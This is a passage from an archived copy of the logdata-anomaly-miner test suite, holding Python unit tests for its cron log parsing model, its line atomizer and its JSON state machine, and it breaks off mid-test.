pam_unix(cron:session): session opened for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session opened for user root by (uid=0)', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session closed for user root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'CRON[25537]: pam_unix(cron:session): session closed for user root', self.cronParsingModel.getMatchElement('stdPam', self.matchContext).getMatchString()) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 21 -> 33 ''' def test6(self): self.matchContext = MatchContext(b'CRON[25537]: CRON info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 10 -> 21 -> 33 ''' def test7(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON;) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 11 -> 21 -> 33 ''' def test8(self): self.matchContext = MatchContext(b'CRON[25537]: (CRON) info (No MTA installed, discarding output)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 12 -> 21 -> 33 ''' def test9(self): self.matchContext = MatchContext(b'CRON[25537]: (root) CMD ') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 22 -> 33 ''' def test10(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session changed for user root by (uid=0)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 23 -> 33 ''' def test11(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 24 -> 33 ''' def test12(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user /usr/root') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 2 -> 3 -> 4 -> 9 -> 13 -> 14 -> 15 -> 16 -> 25 -> 33 Should this case return a MatchElement? It could be an anomaly if a session is opened by another user than root. ''' def test13(self): self.matchContext = MatchContext(b'CRON[25537]: pam_unix(cron:session): session opened for user user by (uid=2)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('stdPam', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 32 ''' def test14(self): self.matchContext = MatchContext(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(b'cron[25537]: (*system*mailman) RELOAD (/var/spool/cron/mailman)', self.cronParsingModel.getMatchElement('low', self.matchContext).getMatchString()) ''' 1 -> 18 -> 26 -> 34 ''' def test15(self): self.matchContext = MatchContext(b'cron[ 25537 ]: (*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 35 ''' def test16(self): self.matchContext = MatchContext(b'cron[25537]:(*system*mailman) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 36 The DelimitedDataModelElement should only return a MatchElement if at least one byte is between the start and the delimeter. ''' def test17(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman)') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 37 ''' def test18(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD /var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 38 ''' def test19(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD ()') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) ''' 1 -> 18 -> 26 -> 27 -> 28 -> 29 -> 30 -> 31 -> 39 ''' def test20(self): self.matchContext = MatchContext(b'cron[25537]: (*system*) RELOAD (/var/spool/cron/mailman') self.cronParsingModel = CronParsingModel.getModel() self.assertEqual(None, self.cronParsingModel.getMatchElement('low', self.matchContext)) if __name__ == "__main__": unittest.main() """ logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/generic/__init__.py000066400000000000000000000000001437606560100254770ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/000077500000000000000000000000001437606560100231235ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/ByteStreamLineAtomizerTest.py000066400000000000000000000207531437606560100307460ustar00rootroot00000000000000import unittest from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from aminer.parsing.MatchContext import MatchContext from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement import sys from unit.TestBase import TestBase class ByteStreamLineAtomizerTest(TestBase): """Unittests for the ByteStreamLineAtomizer.""" illegal_access1 = b'WARNING: All illegal access operations will be denied in a future release' illegal_access2 = 'WARNING: All illegal access operations will be denied in a future release\n\n' def test1normal_line(self): """A normal line is tested as Input of the Class.""" any_dme = AnyByteDataModelElement('s') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, []) data = self.illegal_access1 + b'\n' self.assertEqual(byte_stream_line_atomizer.consume_data(data, False), len(data)) def test2normal_complete_overlong_line(self): """A complete, overlong line is tested as Input of the Class.""" match_context_fixed_dme = MatchContext(self.illegal_access1) any_dme = AnyByteDataModelElement('s') _match_element_fixed_dme = any_dme.get_match_element("match1", match_context_fixed_dme) byte_stream_line_atomizer = ByteStreamLineAtomizer( any_dme, [], [self.stream_printer_event_handler], sys.getsizeof(match_context_fixed_dme.match_data) - 1, []) self.assertGreater( byte_stream_line_atomizer.consume_data(self.illegal_access1 + b'\n', False), 0) self.assertEqual(self.output_stream.getvalue(), 'Overlong line detected (1 lines)\n %s' % self.illegal_access2) def test3normal_incomplete_overlong_line_stream_not_ended(self): """A incomplete, overlong line, with the stream NOT ended, is tested as Input of the Class.""" match_context_fixed_dme = MatchContext(self.illegal_access1) any_dme = AnyByteDataModelElement('s') _match_element_fixed_dme = any_dme.get_match_element("match1", match_context_fixed_dme) byte_stream_line_atomizer = ByteStreamLineAtomizer( any_dme, [], [self.stream_printer_event_handler], sys.getsizeof(match_context_fixed_dme.match_data) - 1, []) self.assertGreater(byte_stream_line_atomizer.consume_data(self.illegal_access1, False), 0) self.assertEqual(self.output_stream.getvalue(), 'Start of overlong line detected (1 lines)\n %s' % self.illegal_access2) def test4normal_incomplete_overlong_line_stream_ended(self): """A incomplete, overlong line, with the stream ended, is tested as Input of the Class.""" any_dme = AnyByteDataModelElement('s') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, []) self.assertGreater(byte_stream_line_atomizer.consume_data(self.illegal_access1, True), 0) self.assertEqual(self.output_stream.getvalue(), 'Incomplete last line (1 lines)\n %s' % self.illegal_access2) def test5eol_sep(self): """Test the eol_sep parameter.""" searched = b'WARNING: All illegal access operations will be denied in a future release\nAnother line of data\nThe third line of ' \ b'data.' any_dme = AnyByteDataModelElement('s') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, [], eol_sep=b'\n\n') data = searched + b'\n\nother line' self.assertEqual(byte_stream_line_atomizer.consume_data(data, False), len(data)-len(b'other line')) def test6json_format(self): """Check if json formatted log data can be processed with the json_format flag.""" json_data = b'{\n\t"a": 1,\n\t"b": {"x": 2}}' data = b'some log line.' any_dme = AnyByteDataModelElement('s') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 300, [], json_format=True) self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data)) # this is no valid json and should process only data until the last \n self.assertEqual(byte_stream_line_atomizer.consume_data(data + json_data + data, False), len(data) + json_data.rfind(b'\n') + 1) json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d": 3}' self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), len(json_data)) self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data)) json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}' self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data)) self.assertEqual(byte_stream_line_atomizer.consume_data(data + json_data, False), len(data) + json_data.rfind(b'\n') + 1) # even when the first json data gets invalidated, the second one starts after an empty line and is therefore valid until the end. json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n\n{\n"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}' self.assertEqual(byte_stream_line_atomizer.consume_data(json_data + data, False), len(json_data)) self.assertEqual(byte_stream_line_atomizer.consume_data(data + json_data + data, False), len(data) + len(json_data)) # this is an incomplete json, but it still can be valid. json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, "d' self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), json_data.rfind(b'\n') + 1) # this is an incomplete json and the end can not be valid. json_data = b'{"a": 1, "b": {"c": 2}, "d": 3}\n{"a": 1, "b": {"c": 2}, d' self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), json_data.rfind(b'\n') + 1) def test7json_max_line_length(self): """Check if json data is not parsed over the max_line_length.""" json_data = b'{\n\t"a": 1,\n\t"b": {\n\t\t"c": 2},\n\t"d": 3}\n{\n"a": 1,\n\t"b": {"c": 2},"d": 3}\n' single_line_json_data = b'{"a": 1,"b": {"c": 2},"d": 3}{"a": 1,"b": {"c": 2},"d": 3' any_dme = AnyByteDataModelElement('s') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 25, [], json_format=True) self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), json_data.rfind(b'\n') + 1) self.assertEqual(self.output_stream.getvalue(), '') self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, True), len(json_data)) self.assertEqual(self.output_stream.getvalue(), '') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 100, [], json_format=True) self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, False), len(json_data)) self.assertEqual(self.output_stream.getvalue(), '') self.assertEqual(byte_stream_line_atomizer.consume_data(json_data, True), len(json_data)) self.assertEqual(self.output_stream.getvalue(), '') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 25, [], json_format=True) self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, True), len(single_line_json_data)) self.assertEqual(self.output_stream.getvalue(), 'Overlong line terminated by end of stream (1 lines)\n {"a": 1,"b": {"c": 2},"d":' ' 3}{"a": 1,"b": {"c": 2},"d": 3\n\n') self.reset_output_stream() self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, False), len(single_line_json_data)) self.assertEqual(self.output_stream.getvalue(), '') byte_stream_line_atomizer = ByteStreamLineAtomizer(any_dme, [], [self.stream_printer_event_handler], 100, [], json_format=True) self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, True), len(single_line_json_data)) self.assertEqual(self.output_stream.getvalue(), 'Incomplete last line (1 lines)\n {"a": 1,"b": {"c": 2},"d": 3\n\n') self.reset_output_stream() self.assertEqual(byte_stream_line_atomizer.consume_data(single_line_json_data, False), len( single_line_json_data.rsplit(b'}', 2)[0]) + 1) self.assertEqual(self.output_stream.getvalue(), '') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/JsonStateMachineTest.py000066400000000000000000000703061437606560100275420ustar00rootroot00000000000000import unittest from aminer.input.JsonStateMachine import json_machine, constant_machine, string_machine, utf8_machine, hex_machine, number_machine,\ array_machine, object_machine from unit.TestBase import TestBase class ByteStreamLineAtomizerTest(TestBase): """Unittests for the JsonStateMachine.""" def test1hex_machine_valid_values(self): """Test the hex_machine with all valid four digit values from 0x0000 to 0xFFFF.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, i) for i in range(65536): string = str(format(i, '#06x')).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) for i in range(65536): string = str(format(i, '#06x')).upper().encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) def test2hex_machine_too_short_value(self): """Test the hex_machine with too short hex values.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, i) for i in range(4096): # converts the integer to the shortest possible hex string. string = str(hex(i)).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) i = 4096 string = str(hex(i)).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) def test3hex_machine_too_long_value(self): """Test the hex_machine with too long hex values. All values longer than 4 digits are stripped.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, i) # only 00FF is read. i = 255 string = b'0x00FFFF'[2:] # remove 0x state = hex_machine(check_value) j = 0 for j, c in enumerate(string): state = state(c) if state is None: break self.assertEqual(j, 3) self.assertIsNone(state) # only 0F12 is read. i = 3858 string = b'0x0F1234'[2:] # remove 0x state = hex_machine(check_value) j = 0 for j, c in enumerate(string): state = state(c) if state is None: break self.assertEqual(j, 3) self.assertIsNone(state) def test4hex_machine_boundary_values(self): """Test boundary values before and after 0-9, a-f, A-F.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, i) allowed_value_list = '0123456789abcdefABCDEF' forbidden_value_list = [int(hex(j), 16) for j in range(48)] + [int(hex(j), 16) for j in range(58, 65)] + [ int(hex(j), 16) for j in range(71, 97)] + [int(hex(j), 16) for j in range(103, 128)] for a in allowed_value_list: state = hex_machine(check_value) string = '0x'+a+a+a+a i = int(string, 16) # convert hex string to integer for _ in range(4): state = state(ord(a)) self.assertEqual(state, None) for f in forbidden_value_list: state = hex_machine(check_value) self.assertIsNone(state(f), "value: %d, char: '%s' should not be allowed in the hex_machine!" % (f, chr(f))) def test5hex_machine_started_from_string_machine(self): """Test if the hex_machine is started from the string_machine.""" def check_value(_data): # skipcq: PY-D0003, PTC-W0049 pass string = b"\u02FF" # skipcq: PYL-W1402 state = string_machine(check_value) hex_machine_found = False for c in string: state = state(c) if state.__name__ == '_hex': hex_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(hex_machine_found) string = b"\uff02" # skipcq: PYL-W1402 state = string_machine(check_value) hex_machine_found = False for c in string: state = state(c) if state.__name__ == '_hex': hex_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(hex_machine_found) def test6utf8_machine_allowed_2_byte_values(self): """ Test all allowed values for the utf8_machine with 2 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex2(data): # skipcq: PY-D0003 self.assertEqual(data, (i - 194)*64 + j) step = 4 for i in range(192, 224): for j in range(128, 192, step): state = utf8_machine(i, check_value_hex2) state = state(j) # check if the state is None only once to save time. self.assertIsNone(state) def test7utf8_machine_forbidden_2_byte_boundary_values(self): """Test all boundary values for 2 byte utf8 values.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(191, raise_error)) self.assertIsNone(utf8_machine(192, raise_error)(127)) self.assertIsNone(utf8_machine(192, raise_error)(192)) self.assertRaises(Exception, utf8_machine(192, raise_error), 128) self.assertRaises(Exception, utf8_machine(192, raise_error), 191) def test8utf8_machine_allowed_3_byte_values(self): """ Test all allowed values for the utf8_machine with 3 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex3(data): # skipcq: PY-D0003 self.assertEqual(data, (i - 224)*64*64 + (j - 128)*64 + k - 128) step = 4 for i in range(224, 240): for j in range(128, 192, step): for k in range(128, 192): state = utf8_machine(i, check_value_hex3) state = state(j) state = state(k) # check if the state is None only once to save time. self.assertIsNone(state) def test9utf8_machine_forbidden_3_byte_boundary_values(self): """Test all boundary values for 3 byte utf8 values.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(224, raise_error)(127)) self.assertIsNone(utf8_machine(224, raise_error)(192)) self.assertIsNone(utf8_machine(224, raise_error)(128)(127)) self.assertIsNone(utf8_machine(224, raise_error)(191)(192)) self.assertRaises(Exception, utf8_machine(224, raise_error)(128), 128) self.assertRaises(Exception, utf8_machine(224, raise_error)(191), 191) def test10utf8_machine_allowed_4_byte_values(self): """ Test all allowed values for the utf8_machine with 4 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex4(data): # skipcq: PY-D0003 self.assertEqual(data, (i - 240)*64*64*64 + (j - 128)*64*64 + (k - 128)*64 + m - 128) step = 4 for i in range(240, 248): for j in range(128, 192, step): for k in range(128, 192, step): for m in range(128, 192, step): state = utf8_machine(i, check_value_hex4) state = state(j) state = state(k) state = state(m) # check if the state is None only once to save time. self.assertIsNone(state) def test11utf8_machine_forbidden_3_byte_boundary_values(self): """Test all boundary values for 4 byte utf8 values.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(240, raise_error)(127)) self.assertIsNone(utf8_machine(240, raise_error)(192)) self.assertIsNone(utf8_machine(240, raise_error)(128)(127)) self.assertIsNone(utf8_machine(240, raise_error)(191)(192)) self.assertIsNone(utf8_machine(240, raise_error)(128)(128)(127)) self.assertIsNone(utf8_machine(240, raise_error)(191)(191)(192)) self.assertRaises(Exception, utf8_machine(240, raise_error)(128)(128), 128) self.assertRaises(Exception, utf8_machine(240, raise_error)(191)(191), 191) def test12utf8_machine_started_from_string_machine(self): """Test if the utf8_machine is started from the string_machine.""" def check_value(_data): # skipcq: PY-D0003, PTC-W0049 pass string = b"File pattern: file\x5f.txt" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertFalse(utf8_machine_found) string = b"It is 20\xc2\xb0C" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) string = b"This is a foreign letter: \xe0\xa0\xab" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) string = b"This is an egyptian hieroglyph: \xf0\x93\x80\x90" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) def test13string_machine_valid_values(self): """Test the string_machine with all valid characters.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, allowed_chars) allowed_chars = "\n" for c in range(0x20, 0x80): if c in (0x22, 0x5c): # skip "\ continue allowed_chars += chr(c) state = string_machine(check_value) for c in allowed_chars.encode(): state = state(c) self.assertEqual(state.__name__, "_string") state = state(ord('"')) self.assertIsNone(state) def test14string_machine_invalid_values(self): """Test the string_machine with some invalid values.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Invalid returned as valid.") for c in range(0x20): # ascii control characters if c == 0xa: continue state = string_machine(raise_error) self.assertIsNone(state(c)) for c in range(0x80, 0xc0): # some characters after the ascii table state = string_machine(raise_error) self.assertIsNone(state(c)) def test15string_machine_escaped_strings(self): """Test all allowed escape strings in the string_machine.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, compare_strings) escape_strings = b"bf\"\\/" compare_strings = "\b\f\"\\/" state = string_machine(check_value) for c in escape_strings: state = state(0x5c) # \ state = state(c) state = state(0x22) # " self.assertIsNone(state) def test16constant_machine_valid_values(self): """Test all allowed values for the constant_machine. The first letter was already handled by the json_machine.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, value) TRUE = [0x72, 0x75, 0x65] FALSE = [0x61, 0x6c, 0x73, 0x65] NULL = [0x75, 0x6c, 0x6c] value = True state = constant_machine(TRUE, True, check_value) for t in TRUE: state = state(t) self.assertIsNone(state) value = False state = constant_machine(FALSE, False, check_value) for f in FALSE: state = state(f) self.assertIsNone(state) value = None state = constant_machine(NULL, None, check_value) for n in NULL: state = state(n) self.assertIsNone(state) def test17constant_machine_invalid_values(self): """Test if constant_machine fails. The first letter was already handled by the json_machine.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Invalid returned as valid.") TRUE = [0x72, 0x75, 0x65] TRUE_UPPER = [0x52, 0x55, 0x45] FALSE = [0x61, 0x6c, 0x73, 0x65] FALSE_UPPER = [0x41, 0x4c, 0x53, 0x45] NULL = [0x75, 0x6c, 0x6c] NULL_UPPER = [0x55, 0x4c, 0x4c] NONE = [0x6f, 0x6e, 0x65] state = constant_machine(TRUE, True, raise_error) self.assertIsNone(state(TRUE_UPPER[0])) state = constant_machine(FALSE, False, raise_error) self.assertIsNone(state(FALSE_UPPER[0])) state = constant_machine(NULL, None, raise_error) self.assertIsNone(state(NULL_UPPER[0])) state = constant_machine(NULL, None, raise_error) self.assertIsNone(state(NONE[0])) def test18constant_machine_started_from_json_machine(self): """Test if the constant_machine is started from the json_machine. Due to changes in the json_machine all values must be objects.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, {'var': value}) OBJECT_PREFIX = [0x7b, 0x22, 0x76, 0x61, 0x72, 0x22, 0x3a, 0x20] # {"var": TRUE = [0x74, 0x72, 0x75, 0x65] FALSE = [0x66, 0x61, 0x6c, 0x73, 0x65] NULL = [0x6e, 0x75, 0x6c, 0x6c] value = True state = json_machine(check_value) for t in OBJECT_PREFIX + TRUE: state = state(t) self.assertEqual(state(ord('}')).__name__, '_value') value = False state = json_machine(check_value) for f in OBJECT_PREFIX + FALSE: state = state(f) self.assertEqual(state(ord('}')).__name__, '_value') value = None state = json_machine(check_value) for n in OBJECT_PREFIX + NULL: state = state(n) self.assertEqual(state(ord('}')).__name__, '_value') def check_number_machine(self, check_int_value, value, end_sign): # skipcq: PY-D0003 state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNone(state(end_sign)) def test19number_machine_valid_values(self): """Test valid values in the number_machine.""" def check_int_value(data, byte_data): # skipcq: PY-D0003 self.assertEqual(data, int(value)) self.assertEqual(end_sign, byte_data) def check_float_value(data, byte_data): # skipcq: PY-D0003 self.assertEqual(round(data, 10), float(value)) self.assertEqual(end_sign, byte_data) end_sign = ord(',') value = b'222' self.check_number_machine(check_int_value, value, end_sign) value = b'9223372036854775808' # maxsize 2^64 self.check_number_machine(check_int_value, value, end_sign) value = b'-222' self.check_number_machine(check_int_value, value, end_sign) value = b'+222' self.check_number_machine(check_int_value, value, end_sign) value = b'21.50' self.check_number_machine(check_float_value, value, end_sign) value = b'21.05' self.check_number_machine(check_float_value, value, end_sign) value = b'-21.05' self.check_number_machine(check_float_value, value, end_sign) value = b'1.56E-5' self.check_number_machine(check_float_value, value, end_sign) value = b'1.56e-5' self.check_number_machine(check_float_value, value, end_sign) def test20number_machine_end_signs(self): """Check if all non numerical signs end the number_machine.""" def check_int_value(data, byte_data): # skipcq: PY-D0003 self.assertEqual(data, int(value)) self.assertEqual(end_sign, byte_data) value = b'222' end_signs = list(range(0x2e)) + list(range(0x3a, 0x45)) + list(range(0x46, 0x65)) + list(range(0x66, 0x80)) valid_signs = [0x2e, 0x45, 0x65] + list(range(0x30, 0x39)) for end_sign in end_signs: state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNone(state(end_sign)) for end_sign in valid_signs: state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNotNone(state(end_sign)) def test21number_machine_invalid_values(self): """Test invalid values in the number_machine.""" def raise_error(_data, _byte_data): # skipcq: PY-D0003 raise Exception("Invalid number treated as valid!") value = b'- 222' state = number_machine(value[0], raise_error) self.assertIsNone(state(value[1])) # octal number value = b'0222' self.assertIsNone(number_machine(value[0], raise_error)(value[1])) # negative octal number value = b'-0222' self.assertIsNone(number_machine(value[0], raise_error)(value[1])(value[2])) # hex number value = b'0x80' self.assertIsNone(number_machine(value[0], raise_error)(value[1])) value = b'NaN' self.assertIsNone(number_machine(value[0], raise_error)) value = b'Infinity' self.assertIsNone(number_machine(value[0], raise_error)) value = b'.1' self.assertIsNone(number_machine(value[0], raise_error)) def check_number_machine_from_json_machine(self, check_int_value, value, end_sign): # skipcq: PY-D0003 state = json_machine(check_int_value) for c in value: state = state(c) self.assertEqual(state(end_sign).__name__, '_value') def test22number_machine_started_from_json_machine(self): """Test if the number_machine is started from the json_machine.""" def check_int_value(data): # skipcq: PY-D0003 self.assertEqual(data, {'value': int(value)}) def check_float_value(data): # skipcq: PY-D0003 data['value'] = round(data['value'], 10) self.assertEqual(data, {'value': float(value)}) end_sign = ord('}') object_prefix = b'{"value": ' value = b'222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'9223372036854775808' # maxsize 2^64 self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'-222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'+222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'0' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'21.50' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'21.05' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'-21.05' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'0.56' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56E-5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56e-5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56e+5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'0.56e+5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) def test23array_machine_valid_array(self): """Test possible valid arrays.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, compare_value) value = b'"string", 22, 22.50, true, false, null]' compare_value = ['string', 22, 22.5, True, False, None] state = array_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) value = b'\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]' state = array_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) value = b'{"value": 22}, {"value": "string"}]' compare_value = [{'value': 22}, {'value': 'string'}] state = array_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) def test24array_machine_invalid_formats(self): """Test the array_machine with invalid formats.""" def raise_error(_): # skipcq: PY-D0003 raise Exception("Invalid returned as valid.") value = b'"string" 22, 22.50, true, false, null]' state = array_machine(raise_error) for c in value[:value.index(b'2') + 1]: state = state(c) self.assertIsNone(state) value = b'"key": {"value": 2}]' state = array_machine(raise_error) for c in value[:value.index(b':') + 1]: state = state(c) self.assertIsNone(state) def test25array_machine_started_from_json_machine(self): """Test if the array_machine is started from the json_machine.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, compare_value) value = b'{"values_array": ["string", 22, 22.50, true, false, null]}' compare_value = {'values_array': ['string', 22, 22.5, True, False, None]} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') value = b'{"values_array": [\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]}' state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') value = b'{"objects_array": [{"value": 22}, {"value": "string"}]}' compare_value = {'objects_array': [{'value': 22}, {'value': 'string'}]} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') def test26object_machine_valid_objects(self): """Check if the object_machine can handle different valid formats.""" def check_value(data): # skipcq: PY-D0003 self.assertEqual(data, compare_value) # single line, no spaces value = b'"string":"Hello World","integer":22,"float":22.23,"bool":true,"array":["Hello","World"]}' compare_value = {'string': 'Hello World', 'integer': 22, 'float': 22.23, 'bool': True, 'array': ['Hello', 